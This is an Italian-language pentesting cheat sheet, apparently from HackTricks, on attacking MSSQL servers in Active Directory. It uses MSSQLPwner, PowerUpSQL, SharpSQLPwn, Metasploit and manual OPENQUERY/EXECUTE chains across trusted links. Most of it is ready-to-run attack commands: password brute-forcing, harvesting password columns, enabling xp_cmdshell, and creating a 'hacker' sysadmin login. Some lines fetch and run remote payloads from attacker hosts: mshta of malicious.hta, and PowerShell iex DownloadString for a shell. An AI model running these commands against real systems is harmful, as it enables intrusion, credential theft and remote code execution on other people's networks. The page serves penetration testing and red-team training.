# Abuso di MSSQL AD {{#include ../../banners/hacktricks-training.md}} ## **Enumerazione / Scoperta di MSSQL** ### Python Lo strumento [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) è basato su impacket e consente anche di autenticarsi utilizzando ticket kerberos e attaccare attraverso catene di link.
```shell # Interactive mode mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive # Interactive mode with 2 depth level of impersonations mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive # Executing custom assembly on the current server with windows authentication and executing hostname command mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname # Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname # Executing the hostname command using stored procedures on the linked SRV01 server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname # Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate # Issuing NTLM relay attack on the SRV01 server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 # Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 # Issuing NTLM relay attack on the local server with custom command mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 # Executing direct query mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER" # Retrieving password from the linked server DC01 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password # Execute code using custom assembly on the linked server DC01 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using tickets against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt # Bruteforce using passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt # Bruteforce using hashes against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt ``` ### Enumerare dalla rete senza sessione di dominio ``` # Interactive mode mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive ```` --- ### Powershell Il modulo powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) è molto utile in questo caso. ```bash Import-Module .\PowerupSQL.psd1 ```` ### Enumerare dalla rete senza sessione di dominio ```bash # Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #If you don't have a AD account, you can try to find MSSQL scanning via UDP #First, you will need a list of hosts to scan Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 #If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them #The discovered MSSQL servers must be on the file: C:\temp\instances.txt Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test ``` ### Enumerare dall'interno del dominio ```bash # Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #Get info about valid MSQL instances running in domain #This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance) Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose # Try dictionary attack to login Invoke-SQLAuditWeakLoginPw # Search SPNs of common software and try the default creds Get-SQLServerDefaultLoginPw #Test connections with each one Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose #Try to connect and obtain info from each MSSQL server (also useful to check conectivity) Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose # Get DBs, test connections and get info in oneliner Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo ``` ## MSSQL Abuso di Base ### Accesso al DB ```bash # List databases Get-SQLInstanceDomain | Get-SQLDatabase # List tables in a DB you can read Get-SQLInstanceDomain | Get-SQLTable -DatabaseName DBName # List columns in a table Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName DBName -TableName TableName # Get some sample data from a column in a table (columns username & passwor din the example) Get-SQLInstanceDomain | GetSQLColumnSampleData -Keywords "username,password" -Verbose -SampleSize 10 #Perform a SQL query Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername" #Dump an instance (a lot of CVSs generated in current dir) Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql" # Search keywords in columns trying to access the MSSQL DBs ## This won't use trusted SQL links Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize ``` ### MSSQL RCE Potrebbe essere anche possibile **eseguire comandi** all'interno dell'host MSSQL ```bash Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults # Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary ``` Controlla nella pagina menzionata nella **seguente sezione come farlo manualmente.** ### MSSQL Tecniche di Hacking di Base {{#ref}} ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ {{#endref}} ## MSSQL Link Fidati Se un'istanza MSSQL è fidata (link del database) da un'altra istanza MSSQL. Se l'utente ha privilegi sul database fidato, sarà in grado di **utilizzare la relazione di fiducia per eseguire query anche nell'altra istanza**. Queste fiducia possono essere concatenate e a un certo punto l'utente potrebbe essere in grado di trovare qualche database mal configurato dove può eseguire comandi. **I link tra i database funzionano anche attraverso le fiducia tra foreste.** ### Abuso di Powershell ```bash #Look for MSSQL links of an accessible instance Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0 #Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified) Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose #If you are sysadmin in some trusted link you can enable xp_cmdshell with: Get-SQLServerLinkCrawl -instance "" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT ""' #Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'" #Obtain a shell Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"' #Check for possible vulnerabilities on an instance where you have access Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local" #Try to escalate privileges on an instance Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1" #Manual trusted link queery Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')" ## Enable xp_cmdshell and check it Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');' Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]' Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]' ## If you see the results of @@selectname, it worked Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');' ``` Un altro strumento simile che potrebbe essere utilizzato è [**https://github.com/lefayjey/SharpSQLPwn**](https://github.com/lefayjey/SharpSQLPwn): ```bash SharpSQLPwn.exe /modules:LIC /linkedsql: /cmd:whoami /impuser:sa # Cobalt Strike inject-assembly 4704 ../SharpCollection/SharpSQLPwn.exe /modules:LIC /linkedsql: /cmd:whoami /impuser:sa ``` ### Metasploit Puoi facilmente controllare i link fidati utilizzando metasploit. ```bash #Set username, password, windows auth (if using AD), IP... msf> use exploit/windows/mssql/mssql_linkcrawler [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session ``` Nota che metasploit cercherà di abusare solo della funzione `openquery()` in MSSQL (quindi, se non riesci a eseguire comandi con `openquery()`, dovrai provare il metodo `EXECUTE` **manualmente** per eseguire comandi, vedi di più qui sotto.) ### Manuale - Openquery() Da **Linux** puoi ottenere una shell console MSSQL con **sqsh** e **mssqlclient.py.** Da **Windows** puoi anche trovare i link ed eseguire comandi manualmente utilizzando un **client MSSQL come** [**HeidiSQL**](https://www.heidisql.com) _Esegui il login utilizzando l'autenticazione di Windows:_ ![](<../../images/image (808).png>) #### Trova Link Affidabili ```sql select * from master..sysservers; EXEC sp_linkedservers; ``` ![](<../../images/image (716).png>) #### Eseguire query in un link affidabile Eseguire query tramite il link (esempio: trova più link nella nuova istanza accessibile): ```sql select * from openquery("dcorp-sql1", 'select * from master..sysservers') ``` > [!WARNING] > Controlla dove vengono utilizzate le virgolette doppie e singole, è importante usarle in quel modo. ![](<../../images/image (643).png>) Puoi continuare questa catena di link fidati all'infinito manualmente. ```sql # First level RCE SELECT * FROM OPENQUERY("", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''') # Second level RCE SELECT * FROM OPENQUERY("", 'select * from openquery("", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')') ``` Se non puoi eseguire azioni come `exec xp_cmdshell` da `openquery()`, prova con il metodo `EXECUTE`. ### Manual - EXECUTE Puoi anche abusare dei link fidati utilizzando `EXECUTE`: ```bash #Create user and give admin privileges EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` ## Elevazione dei privilegi locali L'**utente locale MSSQL** di solito ha un tipo speciale di privilegio chiamato **`SeImpersonatePrivilege`**. Questo consente all'account di "impersonare un client dopo l'autenticazione". Una strategia che molti autori hanno ideato è forzare un servizio SYSTEM ad autenticarsi a un servizio rogue o man-in-the-middle che l'attaccante crea. Questo servizio rogue è quindi in grado di impersonare il servizio SYSTEM mentre sta cercando di autenticarsi. [SweetPotato](https://github.com/CCob/SweetPotato) ha una raccolta di queste varie tecniche che possono essere eseguite tramite il comando `execute-assembly` di Beacon. {{#include ../../banners/hacktricks-training.md}}